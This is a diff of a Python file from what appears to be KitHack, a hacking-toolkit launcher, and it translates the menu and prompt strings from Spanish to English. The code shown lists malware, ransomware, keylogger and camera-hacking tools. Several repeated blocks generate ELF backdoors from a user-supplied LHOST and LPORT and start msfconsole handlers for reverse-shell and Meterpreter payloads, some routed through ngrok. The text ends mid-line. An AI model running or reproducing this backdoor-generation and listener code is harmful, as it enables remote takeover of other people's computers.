('{0}16){1} Quasar {2}Framework de recopilación de información.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}17){1} Info-instagram {2}Permite extraer información de cuentas de instagram.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}18){1} UserScan {2}Scanner de indentidad con el que podras buscar cuentas que tengan un username.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}19){1} XCTR-Hacking {2}Herramientas todo en uno para la recopilación de información.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}20){1} DeadTrap {2}Herramienta OSINT para rastrear huellas de un número de teléfono.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}01){1} NMAP {2}Network Scanning Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}02){1} Th3inspector {2}AIO Information Gathering Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}03){1} FBI {2}Collection of sensitive information on Facebook accounts.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}04){1} Infoga {2}Email Information Extraction Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}05){1} Crips {2}IP Address/Website/DNS Record Lookup Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}06){1} BillCipher {2}Website/IP Address Information Lookup Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}07){1} RED_HAWK {2}Tool to collect information, scan vulnerabilities and trace.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}08){1} Recon-ng {2}Information Gathering Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}09){1} theHarvester {2}Collection of emails, names, subdomains, IP addresses and URLs.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}10){1} PhoneInfoga {2}Phone Number Information Lookup Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}11){1} Gasmask {2}AIO Information Gathering Tool #2.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}12){1} URLextractor {2}Website Information Gathering/Reconnaissance Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}13){1} Devploit {2}Website DNS/WhoIS/IP/GeoIP/Subnet/Port/Host Lookup Tool'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}14){1} ReconDog {2}AIO Basic Information Gathering Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}15){1} Webkiller {2}Information Collection Kit.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}16){1} Quasar {2}Information Collection Framework.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}17){1} Info-instagram {2}Instagram Information Extraction Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}18){1} UserScan {2}Username Lookup/Identity Scanner Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}19){1} XCTR-Hacking {2}AIO Information Gathering Tool #3.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}20){1} DeadTrap {2}Phone Number OSINT Tool.'.format(WHITE, YELLOW, DEFAULT)) print ('{0} 0){1} Back'.format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) @@ -637,7 +627,7 @@ def main(): kitools.DeadTrap() else: - print("\n{}[X] OPCION INVALIDA".format(RED)) + print("\n{}[X] INVALID OPTION".format(RED)) time.sleep(1.5) os.system('clear') main() @@ -645,33 +635,33 @@ def main(): elif option == '09': os.system('clear') print ('======{0}Tool{1}===================================================={0}Information{1}======================================='.format(GREEN, DEFAULT)) - print ('{0}01){1} TheFatRat {2}Herramienta que compila malware para ejecutar en Linux, Windows, Mac y Android.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} Msfpc {2}Contenedor para generar múltiples cargas útiles, según la elección de los usuarios.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} Fcrackzip {2}Script para descifrar archivos ZIP encriptados por contraseña.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} QRLjacker {2}Vector de ataque capaz de secuestrar sesiones que dependen de algun codigo QR.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} Lazy {2}Script que automatiza muchos procesos de penetracion.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} HTBINVITE {2}Generador de codigos de invitacion para HackTheBox.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} Ngrok {2}Proxy inverso que crea un túnel seguro desde un punto público a un servicio local.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} Bluepot {2}Honeypot Bluetooth escrito en Java.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} Setoolkit {2}Marco de prueba de penetración de código abierto diseñado para la ingeniería social.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} A2sv {2}Vulnerabilidad de escaneo automático a SSL.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}11){1} 4nonimizer {2}Anonimiza la IP pública utilizada para navegar por Internet mediante proveedores VPN.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}12){1} Easysploit {2}Automatización de Metasploit.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}13){1} NXcrypt {2}Inyección de malware en archivos con formato python.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}14){1} KnockMail {2}Verifica si existe un correo electronico'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}15){1} RkHunter {2}Herramienta de Unix que detecta los rootkits, puertas traseras y exploits locales.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}01){1} TheFatRat {2}Malware Compiling Tool For Linux/Windows/MacOS & Android.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}02){1} Msfpc {2}Payload Generation Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}03){1} Fcrackzip {2}Archive Password Cracking Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}04){1} QRLjacker {2}QR Code Session Hijacking Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}05){1} Lazy {2}Script that automates many penetration processes.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}06){1} HTBINVITE {2}HTB Invite Generator.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}07){1} Ngrok {2}Local Reverse Proxy.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}08){1} Bluepot {2}Bluetooth Honeypot Written in Java.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}09){1} Setoolkit {2}Open Source Social Engineering Toolkit.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}10){1} A2sv {2}SSL Vulnerability Scanner.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}11){1} 4nonimizer {2}IP Anonymizer Using VPN Services.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}12){1} Easysploit {2}Metasploit Automation Toolkit.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}13){1} NXcrypt {2}Malware Injection Toolkit For Python Files.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}14){1} KnockMail {2}Email Validity Checker'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}15){1} RkHunter {2}UNIX Rootkit/Backdoor/Local Exploit Detection Tool.'.format(WHITE, YELLOW, DEFAULT)) print ('{0}16){1} HeraKeylogger {2}Chrome Keylogger Extension.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}17){1} ZLogger {2}Keylogger remoto persistente para Windows y Linux.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}18){1} Xerosploit {2}Kit de herramientas de pruebas de penetración.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}19){1} Slacksec {2}Kit basico de herramientas hacking.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}20){1} Katana-Framework {2}Unifica distintas herramientas funcionales para pruebas de penetración.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}21){1} Z0172CK-Tools {2}Hacking Tools Z0172CK.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}22){1} Cam-Hack {2}Método avanzado para piratear la cámara de un móvil o una PC con un enlace.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}23){1} Onex {2}Biblioteca de herramientas para hackers.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}24){1} Ransom0 {2}Ransomware diseñado para buscar y cifrar datos de usuarios.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}25){1} Morpheus {2}Suite de Man-In-The-Middle que permite a los usuarios manipular tcp/udp.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}26){1} FBTOOL {2}Kit de herramientas hacking de facebook'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}27){1} Venom {2}Generador/compilador/controlador de shellcode (metasploit).'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}17){1} ZLogger {2}Persistent Remote Keylogger for Windows and Linux.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}18){1} Xerosploit {2}Penetration Testing Toolkit.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}19){1} Slacksec {2}Basic Hacking Toolkit.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}20){1} Katana-Framework {2}Penetration Testing Framework.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}21){1} Z0172CK-Tools {2}Z0172CK Hacking Toolkit.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}22){1} Cam-Hack {2}Advanced Mobile/PC Camera Hacking Tool Using a Link.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}23){1} Onex {2}Hacking Tool Library.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}24){1} Ransom0 {2}Ransomware Creation Tool.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}25){1} Morpheus {2}TCP/UDP Man-in-the-Middle Attack Suite.'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}26){1} FBTOOL {2}Facebook Hacking Toolkit'.format(WHITE, YELLOW, DEFAULT)) + print ('{0}27){1} Venom {2}Metasploit Shellcode Generator/Compiler/Driver.'.format(WHITE, YELLOW, DEFAULT)) print ('{0} 0){1} Back'.format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) @@ -763,7 +753,7 @@ def main(): kitools.Venom() else: - print("\n{}[X] OPCION INVALIDA".format(RED)) + print("\n{}[X] INVALID OPTION".format(RED)) time.sleep(1.5) os.system('clear') main() @@ -813,7 +803,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -821,24 +811,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.elf'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] AN ERROR HAS OCCURED WHILST GENERATING THE PAYLOAD\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -846,7 +836,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -854,24 +844,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.elf'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -879,7 +869,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -887,24 +877,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.elf'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -912,7 +902,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -920,24 +910,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.elf'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -945,7 +935,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -953,24 +943,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.elf'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/shell_bind_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/shell_bind_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -978,7 +968,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -986,24 +976,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.elf'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/shell_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -1011,7 +1001,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -1019,24 +1009,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.elf'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter_reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -1044,7 +1034,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -1052,24 +1042,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.elf'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter_reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -1077,7 +1067,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -1085,24 +1075,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.elf'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD 